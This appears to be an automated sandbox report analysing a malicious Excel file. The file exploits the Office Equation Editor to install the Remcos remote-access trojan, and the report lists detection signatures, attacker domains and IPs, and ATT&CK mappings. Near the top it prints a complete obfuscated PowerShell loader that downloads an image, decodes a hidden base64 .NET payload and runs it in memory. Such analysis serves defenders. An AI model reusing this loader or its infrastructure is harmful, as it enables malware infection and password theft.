qdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredgdgtrenqdgtrevdgtredcdgtremgdgtrewdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredydgtremwdgtrewdgtredcdgtrengdgtrezdgtredqdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.ewh/005001/451.871.64.891//:ptth' , '1' , 'c:\programdata\' , 'incontrovertido','regasm',''))} }"Jump to behavior
            Source: RegAsm.exe, 00000011.00000002.1078551055.00000000008EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager97\-P
            Source: RegAsm.exe, 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program Manager
            Source: RegAsm.exe, 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager Ref19920830281982938RT [Compatibility Mode]
            Source: RegAsm.exe, 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: nots.dat.17.drBinary or memory string: [Program Manager]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00434C52 cpuid 17_2_00434C52
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,17_2_00452036
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_004520C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,17_2_00452313
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,17_2_00448404
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_0045243C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,17_2_00452543
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00452610
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,17_2_0040F8D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,17_2_004488ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,17_2_00451CD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,17_2_00451F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,17_2_00451F9B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00448957 GetSystemTimeAsFileTime,17_2_00448957
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041B60D GetUserNameW,17_2_0041B60D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,17_2_00449190
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3972, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
            Contains functionality to steal Chrome passwords or cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data17_2_0040BA12
            Contains functionality to steal Firefox passwords or cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\17_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db17_2_0040BB30

            Remote Access Functionality

            barindex
            Detected Remcos RAT
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-999Z97Jump to behavior
            Yara detected Remcos RAT
            Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3972, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe17_2_0040569A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information131
            Scripting            		Valid Accounts1
            Native API            		131
            Scripting            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services11
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts43
            Exploitation for Client Execution            		1
            DLL Side-Loading            		1
            Bypass User Account Control            		21
            Obfuscated Files or Information            		211
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol211
            Input Capture            		15
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts12
            Command and Scripting Interpreter            		1
            Windows Service            		1
            Access Token Manipulation            		1
            Install Root Certificate            		2
            Credentials In Files            		1
            System Service Discovery            		SMB/Windows Admin Shares3
            Clipboard Data            		21
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            Service Execution            		11
            Registry Run Keys / Startup Folder            		1
            Windows Service            		1
            DLL Side-Loading            		NTDS3
            File and Directory Discovery            		Distributed Component Object ModelInput Capture1
            Non-Standard Port            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts3
            PowerShell            		Network Logon Script322
            Process Injection            		1
            Bypass User Account Control            		LSA Secrets34
            System Information Discovery            		SSHKeylogging1
            Remote Access Software            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
            Registry Run Keys / Startup Folder            		1
            Masquerading            		Cached Domain Credentials2
            Security Software Discovery            		VNCGUI Input Capture3
            Non-Application Layer Protocol            		Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Modify Registry            		DCSync21
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal Capture214
            Application Layer Protocol            		Exfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Virtualization/Sandbox Evasion            		Proc Filesystem3
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation            		/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron322
            Process Injection            		Network Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
            Remote System Discovery            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447833 Sample: Ref19920830281982938RT.xls Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 63 z2.ink 2->63 89 Snort IDS alert for network traffic 2->89 91 Multi AV Scanner detection for domain / URL 2->91 93 Found malware configuration 2->93 95 25 other signatures 2->95 10 EXCEL.EXE 59 39 2->10         started        14 wscript.exe 2->14         started        17 wscript.exe 2->17         started        signatures3 process4 dnsIp5 77 198.46.178.154, 49162, 49167, 49170 AS-COLOCROSSINGUS United States 10->77 79 z2.ink 54.241.153.192, 49161, 49163, 49164 AMAZON-02US United States 10->79 57 lioniskingandtiger...lionbeauties[1].doc, ISO-8859 10->57 dropped 19 wscript.exe 11 10->19         started        23 WINWORD.EXE 339 33 10->23         started        135 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->135 file6 signatures7 process8 dnsIp9 65 paste.ee 19->65 67 uploaddeimagens.com.br 188.114.97.3, 443, 49172, 49173 CLOUDFLARENETUS European Union 19->67 97 System process connects to network (likely due to code injection or exploit) 19->97 99 Suspicious powershell command line found 19->99 101 Wscript starts Powershell (via cmd or directly) 19->101 111 5 other signatures 19->111 26 powershell.exe 4 19->26         started        69 z2.ink 23->69 47 C:\Users\user\AppData\Roaming\...\z2.ink.url, MS 23->47 dropped 49 C:\Users\user\AppData\Roaming\...\nLNG.url, MS 23->49 dropped 51 ~WRF{8D0975D7-21A3...9-C358C75C774D}.tmp, Composite 23->51 dropped 53 C:\Users\user\AppData\Local\...\A9EAB33D.doc, ISO-8859 23->53 dropped 103 Microsoft Office launches external ms-search protocol handler (WebDAV) 23->103 105 Office viewer loads remote template 23->105 107 Microsoft Office drops suspicious files 23->107 29 EQNEDT32.EXE 12 23->29         started        file10 109 Connects to a pastebin service (likely for C&C) 65->109 signatures11 process12 file13 127 Suspicious powershell command line found 26->127 129 Suspicious execution chain found 26->129 32 powershell.exe 13 6 26->32         started        59 C:\Users\...\onsandtigerbeautifulpicture.vbs, Unicode 29->59 dropped 131 Office equation editor establishes network connection 29->131 133 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 29->133 signatures14 process15 dnsIp16 61 uploaddeimagens.com.br 32->61 81 Suspicious powershell command line found 32->81 83 Creates autostart registry keys with suspicious values (likely registry only malware) 32->83 85 Writes to foreign memory regions 32->85 87 Injects a PE file into a foreign processes 32->87 36 RegAsm.exe 32->36         started        39 RegAsm.exe 3 13 32->39         started        43 powershell.exe 5 32->43         started        45 RegAsm.exe 32->45         started        signatures17 process18 dnsIp19 113 Contains functionality to bypass UAC (CMSTPLUA) 36->113 115 Contains functionality to steal Chrome passwords or cookies 36->115 117 Contains functionality to register a low level keyboard hook 36->117 125 2 other signatures 36->125 71 sembe.duckdns.org 39->71 73 sembe.duckdns.org 194.187.251.115, 14645, 49176 M247GB United Kingdom 39->73 75 geoplugin.net 178.237.33.50, 49177, 80 ATOM86-ASATOM86NL Netherlands 39->75 55 C:\Users\user\AppData\Local\Temp\...\nots.dat, data 39->55 dropped 119 Detected Remcos RAT 39->119 121 Installs a global keyboard hook 39->121 file20 123 Uses dynamic DNS services 71->123 signatures21

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Ref19920830281982938RT.xls5%ReversingLabs
            Ref19920830281982938RT.xls8%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties[1].doc100%AviraHEUR/Rtf.Malformed
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EAB33D.doc100%AviraHEUR/Rtf.Malformed
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8D0975D7-21A3-4DB8-9D99-C358C75C774D}.tmp100%AviraEXP/CVE-2017-11882.Gen

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            sembe.duckdns.org13%VirustotalBrowse
            paste.ee3%VirustotalBrowse
            z2.ink4%VirustotalBrowse
            geoplugin.net0%VirustotalBrowse
            uploaddeimagens.com.br5%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            https://analytics.paste.ee0%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://geoplugin.net/json.gp100%URL Reputationphishing
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
            http://geoplugin.net/json.gp/C100%URL Reputationphishing
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://secure.comodo.com/CPS00%URL Reputationsafe
            https://secure.gravatar.com0%URL Reputationsafe
            https://themes.googleusercontent.com0%URL Reputationsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            http://z2.ink/nLNG0%Avira URL Cloudsafe
            http://198.46.178.154/100500/HWE.txt0%Avira URL Cloudsafe
            http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc0%Avira URL Cloudsafe
            https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634100%Avira URL Cloudmalware
            https://paste.ee/d/iuC2i0%Avira URL Cloudsafe
            https://www.google.com;0%Avira URL Cloudsafe
            http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpj0%Avira URL Cloudsafe
            https://paste.ee/d/iuC2igv0%Avira URL Cloudsafe
            http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc7%VirustotalBrowse
            http://198.46.178.154/100500/HWE.txt7%VirustotalBrowse
            http://z2.ink/nLNG4%VirustotalBrowse
            https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?171630763413%VirustotalBrowse
            https://paste.ee/e0%Avira URL Cloudsafe
            http://z2.ink/nLNGyX0%Avira URL Cloudsafe
            http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmp0%Avira URL Cloudsafe
            https://paste.ee/d/iuC2i3%VirustotalBrowse
            http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpj7%VirustotalBrowse
            sembe.duckdns.org0%Avira URL Cloudsafe
            http://z2.ink/nLNGyX4%VirustotalBrowse
            https://www.google.com0%Avira URL Cloudsafe
            https://paste.ee/e2%VirustotalBrowse
            https://uploaddeimagens.com.br/images/000%Avira URL Cloudsafe
            https://uploaddeimagens.com.br0%Avira URL Cloudsafe
            https://analytics.paste.ee;0%Avira URL Cloudsafe
            https://www.google.com0%VirustotalBrowse
            https://cdnjs.cloudflare.com0%Avira URL Cloudsafe
            https://uploaddeimagens.com.br/images/003%VirustotalBrowse
            https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
            http://z2.ink/0%Avira URL Cloudsafe
            https://uploaddeimagens.com.br7%VirustotalBrowse
            sembe.duckdns.org13%VirustotalBrowse
            http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpw0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com0%VirustotalBrowse
            http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmp7%VirustotalBrowse
            http://z2.ink/4%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            sembe.duckdns.org
            		194.187.251.115
            		truetrueunknown
            paste.ee
            		188.114.97.3
            		truetrueunknown
            z2.ink
            		54.241.153.192
            		truetrueunknown
            geoplugin.net
            		178.237.33.50
            		truefalseunknown
            uploaddeimagens.com.br
            		188.114.97.3
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634true
            • 13%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            https://paste.ee/d/iuC2itrue
            • 3%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doctrue
            • 7%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://z2.ink/nLNGfalse
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://198.46.178.154/100500/HWE.txttrue
            • 7%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmptrue
            • 7%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://geoplugin.net/json.gptrue
            • URL Reputation: phishing
            		unknown
            sembe.duckdns.orgtrue
            • 13%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://crl.entrust.net/server1.crl0wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://ocsp.entrust.net03wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpjEQNEDT32.EXE, 00000007.00000002.425990607.000000000061F000.00000004.00000020.00020000.00000000.sdmpfalse
            • 7%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://contoso.com/Licensepowershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.google.com;wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://analytics.paste.eewscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.diginotar.nl/cps/pkioverheid0wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://paste.ee/d/iuC2igvwscript.exe, 00000009.00000003.431827511.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.0000000000716000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://paste.ee/ewscript.exe, 00000009.00000002.436417928.0000000003AA6000.00000004.00000020.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
